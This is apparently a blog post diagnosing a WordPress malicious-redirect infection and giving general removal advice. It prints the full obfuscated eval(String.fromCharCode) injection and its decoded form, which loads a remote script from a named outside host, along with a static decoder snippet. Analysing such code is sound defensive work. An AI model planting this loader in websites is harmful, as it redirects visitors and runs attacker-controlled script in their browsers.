Yesterday, I saw a webmaster asking in a group about a WordPress-built website that automatically redirects to someone else's website as soon as it opens. Then Naiba visited the URL he sent privately to take a look.
WordPress Infected with Malicious Redirect Code
When opening your own website, after most of the website content loads, it automatically redirects to a third-party website, and it may redirect through several websites consecutively. At the same time, the redirected website will ask you to grant it notification permissions, as shown in the figure below:

Then I analyzed the website's source code (many Plugins were installed, resulting in a lot of js and other code, making it very messy). Finally, I found that the following string of code seemed abnormal. I asked the webmaster, and it wasn't his own code nor from any of the Plugins he installed.
eval(String.fromCharCode(118, 97, 114, 32, 100, 61, 100, 111, 99, 117, 109, 101, 110, 116, 59, 118, 97, 114, 32, 115, 61, 100, 46, 99, 114, 101, 97, 116, 101, 69, 108, 101, 109, 101, 110, 116, 40, 39, 115, 99, 114, 105, 112, 116, 39, 41, 59, 32, 10, 115, 46, 116, 121, 112, 101, 61, 39, 116, 101, 120, 116, 47, 106, 97, 118, 97, 115, 99, 114, 105, 112, 116, 39, 59, 10, 115, 46, 97, 115, 121, 110, 99, 61, 116, 114, 117, 101, 59, 10, 118, 97, 114, 32, 112, 108, 32, 61, 32, 83, 116, 114, 105, 110, 103, 46, 102, 114, 111, 109, 67, 104, 97, 114, 67, 111, 100, 101, 40, 49, 48, 52, 44, 32, 49, 49, 54, 44, 32, 49, 49, 54, 44, 32, 49, 49, 50, 44, 32, 49, 49, 53, 44, 32, 53, 56, 44, 32, 52, 55, 44, 32, 52, 55, 44, 32, 57, 56, 44, 32, 49, 48, 56, 44, 32, 57, 55, 44, 32, 57, 57, 44, 32, 49, 48, 55, 44, 32, 57, 55, 44, 32, 49, 49, 57, 44, 32, 57, 55, 44, 32, 49, 49, 52, 44, 32, 49, 48, 48, 44, 32, 57, 55, 44, 32, 49, 48, 51, 44, 32, 49, 49, 49, 44, 32, 52, 54, 44, 32, 57, 57, 44, 32, 49, 49, 49, 44, 32, 49, 48, 57, 41, 59, 10, 115, 46, 115, 114, 99, 61, 112, 108, 43, 39, 47, 115, 116, 97, 116, 46, 106, 115, 63, 108, 61, 49, 49, 38, 39, 59, 32, 10, 105, 102, 32, 40, 100, 111, 99, 117, 109, 101, 110, 116, 46, 99, 117, 114, 114, 101, 110, 116, 83, 99, 114, 105, 112, 116, 41, 32, 123, 32, 10, 100, 111, 99, 117, 109, 101, 110, 116, 46, 99, 117, 114, 114, 101, 110, 116, 83, 99, 114, 105, 112, 116, 46, 112, 97, 114, 101, 110, 116, 78, 111, 100, 101, 46, 105, 110, 115, 101, 114, 116, 66, 101, 102, 111, 114, 101, 40, 115, 44, 32, 100, 111, 99, 117, 109, 101, 110, 116, 46, 99, 117, 114, 114, 101, 110, 116, 83, 99, 114, 105, 112, 116, 41, 59, 10, 125, 32, 101, 108, 115, 101, 32, 123, 10, 100, 46, 103, 101, 116, 69, 108, 101, 109, 101, 110, 116, 115, 66, 121, 84, 97, 103, 78, 97, 109, 101, 40, 39, 104, 101, 97, 100, 39, 41, 91, 48, 93, 46, 97, 112, 112, 101, 110, 100, 67, 104, 105, 108, 100, 40, 115, 41, 59, 10, 125));
Then Naiba searched for this eval(String.fromCharCode and found the following recorded article.
Record - Website HACKED!
Then, via the website jdstiles.com, the meaning of the above string of code was parsed:
var d=document;var s=d.createElement('script');
s.type='text/javascript';
s.async=true;
var pl = String.fromCharCode(104, 116, 116, 112, 115, 58, 47, 47, 98, 108, 97, 99, 107, 97, 119, 97, 114, 100, 97, 103, 111, 46, 99, 111, 109);
s.src=pl+'/stat.js?l=11&';
if (document.currentScript) {
document.currentScript.parentNode.insertBefore(s, document.currentScript);
} else {
d.getElementsByTagName('head')[0].appendChild(s);
}
Parsing the above numbers again resulted in the following website.
https://blackawardago.com
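As an added example (not code from the original article or from jdstiles.com), the same two-step decoding can be done offline in Node.js without ever running the injected script. The function names and the placeholder host malicious.example are assumptions, and the sample input is constructed to have the same two-layer shape as the code above.

```javascript
// Static decoder for String.fromCharCode(...) obfuscation: nothing is eval'd or fetched.
const CALL_RE = /String\.fromCharCode\(\s*((?:\d+\s*,\s*)*\d+)\s*\)/g;

// Turn "104, 116, ..." into the string those character codes spell.
function decodeCodes(list) {
  return list.split(',').map(n => String.fromCharCode(parseInt(n, 10))).join('');
}

// Decode every call in `source`, then decode the result again until no call
// is left (the injected code on this page is nested two layers deep).
function decodeLayers(source, maxDepth = 5) {
  const layers = [];
  let current = source;
  for (let depth = 0; depth < maxDepth; depth++) {
    const decoded = [...current.matchAll(CALL_RE)].map(m => decodeCodes(m[1]));
    if (decoded.length === 0) break;
    layers.push(decoded);
    current = decoded.join('\n');
  }
  return layers;
}

// Rewrite a URL so it cannot be clicked or auto-linked in a report.
const defang = url => url.replace(/^http/, 'hxxp').replace(/\./g, '[.]');

// Summarise what the hidden code does, for triage.
function analyze(source) {
  const layers = decodeLayers(source);
  const text = layers.flat().join('\n');
  const urls = [...new Set(text.match(/https?:\/\/[^\s'"<>)]+/g) || [])];
  return {
    depth: layers.length,                                    // obfuscation layers peeled
    usesEval: /eval\s*\(\s*String\.fromCharCode/.test(source),
    injectsScript: /createElement\(\s*['"]script['"]\s*\)/.test(text),
    urls: urls.map(defang),                                  // hosts the loader pulls from
    decoded: layers,
  };
}

// Constructed sample with the same shape as the injected code; malicious.example
// is a placeholder host (an assumption), not the host found on the page.
const encode = s => `String.fromCharCode(${[...s].map(c => c.charCodeAt(0)).join(', ')})`;
const inner = "var s=document.createElement('script');\n" +
  `var pl = ${encode('https://malicious.example')};\ns.src=pl+'/stat.js?l=11&';`;
const SAMPLE_PAGE = `<script>eval(${encode(inner)});</script>`;

console.log(analyze(SAMPLE_PAGE));
```

The same `analyze` function can be fed the contents of a theme file or a database export, since it only needs text.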
Regardless of what URL finally appears, it's known that the website has been hacked. Abroad, this is called WordPress malicious redirect code, which seems to have become popular since 2018. Below are two articles Naiba saw while searching for information.
https://www.getastra.com/e/malware/infections/wordpress-redirect-hack-js_charcode_voip_ad-malware
https://stackoverflow.com/questions/52282559/how-to-delete-script-injected-on-wordpress-site-ads-voipnewswire-net
If you want to know if your website is also infected with this malicious redirect code, you can check it via the following website.
https://sitecheck.sucuri.net/
WordPress Malicious Redirect Code Removal Methods
So, if a site is infected with WordPress malicious redirect code, how do you remove it? (Because that website owner didn't ask me to help handle it, Naiba didn't have access to the actual code. Below are the general handling methods.)
Solution for those who can understand code
- Find the malicious code and delete it.
- Check all website files and code to see if there are any other infected or unknown scripts, delete them.
- Check if the database is infected, if yes, delete the infected content.
Solution for those who cannot understand code
- Pay someone who understands code to clean it for you. The foreign price I saw above is $108/year.
- Delete the website and reinstall it, ensure using secure Themes and Plugins, ensure the database is not infected, ensure server security.
If any experts reading this article know how to clean this type of malicious code, or have experience cleaning malicious code, please leave a comment to advise.
Finally, a Plugin recommendation:
Install a firewall for WordPress! Try Wordfence
Related knowledge:
Implement security measures to prevent WordPress websites from being hacked